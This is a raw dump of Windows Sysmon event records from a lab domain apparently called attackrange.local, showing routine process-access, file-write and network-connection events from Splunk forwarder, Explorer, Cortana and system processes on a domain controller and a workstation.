07:44:54.138{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.138{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F2F6-60EB-F67C-00000000CF01}4136C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.138{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F6-60EB-F67C-00000000CF01}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.140{466BC892-F2F6-60EB-F67C-00000000CF01}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:55.994{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=988D3A2A1AD919FD8E8690CEEB88D574,SHA256=BBC87586CEC04E91C3C33C80C63930000D6FB34D1F9FE3328A1E3271E407355B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806210Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:55.862{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B94496384448391F508E8AC3D9554357,SHA256=5434888DEFFC6E42042B20E264B48FCA7015930C934835712DF5CDAB67C5CBA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:55.679{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=5818DFC3E741738A4797EE89ADFAD3C5,SHA256=C1C0F897AE1D91C2DF2FC9343770B9115FB7B4FECFD21E70EFFB208A888EB973,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:55.156{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD34199EAF392EEF26A198838FBE6E7C,SHA256=B24A6418C8EBEFBF7975CCB5E8FC13E333C3B048C29BABF6817C69FB65F3C2F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806211Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:56.862{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A89C9A7C3FA82C293DBD2B21BB7D1EB,SHA256=462A333181DD393F60015773F072A41E5C93B01C37CE5B94C316B6E4E7066D8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:56.760{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806213Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:57.878{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9136C8ACA135A79E185A936D39BBAD0,SHA256=A72272A3A1D1864400A044CB9ADCDDC453351A9AF6434B0E5266BA97EB1983E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806212Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:55.386{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57164-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001046178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:48.765{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50918-false10.0.1.12-8000- 23542300x80000000000000001046177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:57.009{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D9BCB01C891F08FEC2918E0C0FB84B0,SHA256=A5AC309E3B9E127F4641D337356803AA5F819ECC1B6EB00C0AB5A31294E3F302,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806214Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:58.894{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63589965E53EFCE17A61FA88150C8D55,SHA256=CC7C707506E8F33C0C68554BB372C7BB6E7E27469294BD5C2A0012EFA3A97415,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.296{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50919-false10.0.1.12-8089- 23542300x80000000000000001046180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:58.059{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf629e70.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:58.057{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1C326EFC62382E1B23315BCCCCD9FAF,SHA256=631E1760D1603CD914F06DAC179F52EBEB9EDF7186976C9A11CC0905F53BEAF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806215Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:59.894{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CF1B4FAFA893EB9A3AD9D030278838B,SHA256=E9694D26E0A4C26E45DDA50D89BE7FEF4EE84C462B590177BF7D4EFF11981572,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:59.091{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42B6486F0E3E5CFBCE9DACDF33ED65D7,SHA256=DC3DEB10E03AB27738D03891781A94FEC679244B108C901CE0C1C3F64F7A9BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806216Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:00.894{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CC42BFE9BF98CD9ED261F11B6F9BE8B,SHA256=690AD87AB2FD3546B4204B2CDBF5B7FDFFE5CB8798B115D8A2D28CA715EAC0AE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.757{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C
:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001046259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.756{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001046258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.754{466BC892-32D3-60E8-770B-00000000CF01}63562944C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.754{466BC892-32D3-60E8-770B-00000000CF01}63562944C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.736{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DF0ED6F82C65D884D9E6A6B28B92EC0,SHA256=9936637E33257E7EC2AB88A8D68CE7CC5D234BB972B0DA99376C1CC1EB91C96A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.705{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.705{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001046253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.705{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.705{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=183C5FD9B02178EAD5DC51D2253F1096,SHA256=E34E5DFD79E69C2E21F1DC8A8ED978B27E69EE735C42C9EFAA35276B90BBBC67,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.689{466BC892-02BC-60E8-2C00-00000000CF01}30644868C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001046250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.689{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001046249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.689{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001046248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.689{466BC892-02BC-60E8-2C00-00000000CF01}30644868C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x80000000000000001046247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
